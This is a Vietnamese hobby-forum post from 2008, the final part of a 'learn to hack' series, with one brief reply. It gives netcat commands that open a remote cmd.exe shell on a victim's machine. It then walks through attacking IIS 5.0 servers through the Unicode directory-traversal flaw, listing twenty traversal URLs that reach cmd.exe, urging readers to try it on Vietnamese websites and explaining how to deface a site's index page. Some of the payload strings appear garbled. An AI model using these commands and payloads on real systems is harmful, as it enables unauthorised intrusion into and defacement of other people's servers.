..:: CAN Entertainment | 4Rum ::..

.. Xin Chào Mừng Tất Cả Các Bạn Đến Với Hệ Thống Giải Trí Trực Tuyến CAN. Nơi Đây Có Lẽ Là Nơi Thăng Hoa Cảm Xúc Của Tất Cả Mọi Lứa Tuổi ..
Trang ChínhGalleryCalendarTrợ giúpTìm kiếmThành viênĐăng kýĐăng Nhập
Webmaster: Kim Thủy
Chat with Webmaster
Smod: Thanh Tùng
Chat with Smod
Liên Kết

DịchVCAN

>> Nghe Nhạc Online

>> Lấy Avartar Y!M

>> Album Ảnh 8/11

>> Bói Trực Tuyến

Poll
Trưng Cầu Dân Ý - Đợt 1 - Năm 2008
+ Friendship
43%
 43% [ 3 ]
+ Back2School
57%
 57% [ 4 ]
+ Enviroment
0%
 0% [ 0 ]
+ Ý kiến khác, Post tại bài bài thông báo này
0%
 0% [ 0 ]
Tổng số bầu chọn : 7
cCare

 

 

 

< class="" height="25"> Latest topics
» Drug Abuse Saint George Utah
Thu Aug 04, 2011 12:10 pm by

» Find Newest Medication For
Mon Aug 01, 2011 7:59 am by

» When the first Whirlpool Duet album was released in December 2001
Sun Jul 31, 2011 11:38 pm by

» Folk Medicine Alternative Health
Fri Jul 29, 2011 3:37 am by

» Phần mềm xem đồ họa 3D/2D và máy nghe nhạc đa phương tiện!!
Wed Jul 06, 2011 9:26 pm by

» Xung Quanh Vụ ném bom nguyên tử xuống Hiroshima và Nagasaki
Wed Jul 06, 2011 9:24 pm by

» GOM Player – Phần mềm chơi nhạc đa phương tiện FREE
Thu Sep 23, 2010 4:03 pm by

» Phần mềm DVD-Cloner - sao chép DVD siêu tốc, chất lượng cao
Thu Sep 23, 2010 3:57 pm by

» Phần mềm ghi âm cuộc gọi MX Skype Recorder
Thu Sep 23, 2010 3:48 pm by


Tap lam hacker (10 phan cuoi) Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Tác giả

avatar

[Mem] constantine
> V.I.P Super Mod < > V.I.P Super Mod

Nam
.:.Thông tin.:.

Age : 25 Registration date : 27/06/2008 Tổng số bài gửi : 515 Đến từ : Somewhere Job/hobbies : none Humor : none


Bài gửiTiêu đề: Tap lam hacker (10 phan cuoi) Fri Jun 27, 2008 2:18 pm
Như các bạn đã thấy , ta có thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé :

CODE
E:\ > nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...?
?


Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s<địa_chỉ_ip_của_máy_này > . Ví dụ:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe
...
E:\ > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?


Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.
Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49.) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không :

CODE
telnet < tên trang Web > 80
GET HEAD / HTTP/1.0


Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl
Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .


_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+


Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%p c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3
hoặc
http://www.xxx.com/scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .
Xem lý lịch thành viên http://vinh-kien.piczo.com

avatar

[Mem] bebietyeu0
..:: Good Members ::.. ..:: Good Members ::..

.:.Thông tin.:.

Age : Registration date : 05/05/2008 Tổng số bài gửi : 34 Đến từ : Job/hobbies : Humor :


Bài gửiTiêu đề: Re: Tap lam hacker (10 phan cuoi) Tue Jul 01, 2008 3:07 pm
ttroi oi..thay lam hackr cuc kho wa'..voi lai de bi bat lam hok lam dau>>doc wa cho bik thui
Xem lý lịch thành viên

Thông điệp:

--*--{Hãy cùng chia s? v?i b?n bè b?ng cách }--*--

Copy du?ng link du?i dây g?i d?n nick yahoo b?n bè!

Tap lam hacker (10 phan cuoi) Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang

Permissions in this forum: Bạn không có quyền trả lời bài viết
..:: CAN Entertainment | 4Rum ::..  :: 

( »»--(¯`° IT World | The Gioi CNTT °´¯)--»» )

 :: 

Software

-

( »»--(¯`° Bản Quyền Của Forum Này Chỉ Thuộc Về CAN Entertainment °´¯)--»» )

Tất Cả Thời Gian Được Tính Theo GMT+7. Hôm nay: Thu Feb 22, 2018 12:10 am
Designed by Huynh Kim Thuy & Pham Thanh Tung.
Developed by Canner.
Copyright © 10/2008, Can Entertainment . All rights reserved.
Powered by: phpBB 2.0
Copyright © 2008-2009 Forumotion.Com

Create a forum on Forumotion | © phpBB | Free forum support | Report an abuse | Sosblogs.com